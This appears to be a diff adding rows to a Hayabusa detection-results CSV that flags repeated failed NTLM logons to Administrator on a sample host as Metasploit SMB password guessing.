+2016-09-20 01:51:20.125 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0Iau1IHKxWRsqQaG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NdPC9LVhZS2l27XF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vxcofRpjCFme3mg2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: e1VnQLbETh1GgX0c  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.290 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rbdPYXx8mx4SV9G7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hcv3HWid3auIu7cY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5o2OviUvdOmk5HON  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.428 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bVBSORhgFwTy2TWO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.476 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DsIhCEZcfYenufvf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xDadVFtE4toNiagy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GnydJjDBdzJWqmWa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.601 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GW8im2IhNzrGoSFs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aTzlqq9HLEX6wzdU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Gz98aGXd0fdVzmTy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.785 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q2zOy64cp6dXelNl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.812 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: X1BflxNjQRNopjb4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.858 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 401ulFeuzCtp5lPF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.914 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: p0SIzJrzkseFB1j8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cyQMxtEdbud8iJLI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7gbjIqxD4E6fYsGx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rEeZEcj63sBddCsK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.084 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tiATfqYtrH9LoqR0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PG3HB3GqFwQFLdcq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.169 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: G8NU6WRdrq9DxM6r  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.216 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cvZKIkI2aeBzbwe0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.258 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2EE7AL3nJ7qsnk4Y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.331 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: feu34D0VvoMrnWzo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.331 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mrNRIpCpmAV3npax  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.369 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zpxgEvvoC0stFdTl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.401 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XvpDKRAPDS36sqNL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.445 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4cqJKEIySxiQdCRD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.496 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Pm1F7QEwBE054ui0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.535 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RvIjhyfdlXiX72Es  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dJilW4KgIEeh5VNr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.622 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2Ka0FYYdVOj90l0L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.715 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: B9ZjGE8T6RuGx8SZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.715 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nkti4BGVrpoAQRBL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.758 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fZy2YJPOg1YZ2bd0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.804 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rUE6E9H9i0l0P7Jp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0Pkpt2nmRorQ3x0o  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.892 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hCZNNzSyi4mLLaxZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.937 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: O9ZqF43sDjSirvMK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.986 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XOw9DjHISDX57XUe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.041 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rmxFpEQeGsgbXpDy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.083 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MfIVCOOWQS7TNKQA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.129 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
